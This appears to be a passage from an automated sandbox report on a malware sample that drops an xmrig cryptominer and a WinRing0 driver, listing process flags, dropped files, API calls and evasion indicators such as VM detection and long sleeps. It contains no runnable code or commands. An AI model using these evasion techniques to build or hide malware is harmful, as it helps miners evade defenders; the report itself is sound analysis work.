Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\xmrig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\ProgramData\Drivers\xmrig.exe System information queried: FirmwareTableInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 554 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3789 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6076 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 2617
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2810
Source: C:\ProgramData\Drivers\xmrig.exe Window / User API: threadDelayed 9942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3597
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Roaming\1.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\6.exe Dropped PE file which has not been started: C:\ProgramData\Drivers\WinRing0x64.sys Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\2.exe Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\1.exe API coverage: 6.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692 Thread sleep count: 3789 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780 Thread sleep count: 6076 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep count: 4573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep count: 2810 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Drivers\xmrig.exe TID: 5176 Thread sleep count: 9942 > 30
Source: C:\ProgramData\Drivers\xmrig.exe TID: 1856 Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep count: 3220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep count: 3597 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4156 Thread sleep time: -3689348814741908s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332A40CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF900 FindFirstFileExA, 0_2_00007FF7332CF900
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57140CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C57140CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F900 FindFirstFileExA, 6_2_00007FF6C573F900
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA438 FindClose,abort,FindFirstFileExW,GetLastError, 27_2_00007FF7033FA438
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2CADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2B40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF900 FindFirstFileExA, 31_2_00007FF75C2DF900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C1304 VirtualQuery,GetSystemInfo, 0_2_00007FF7332C1304
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
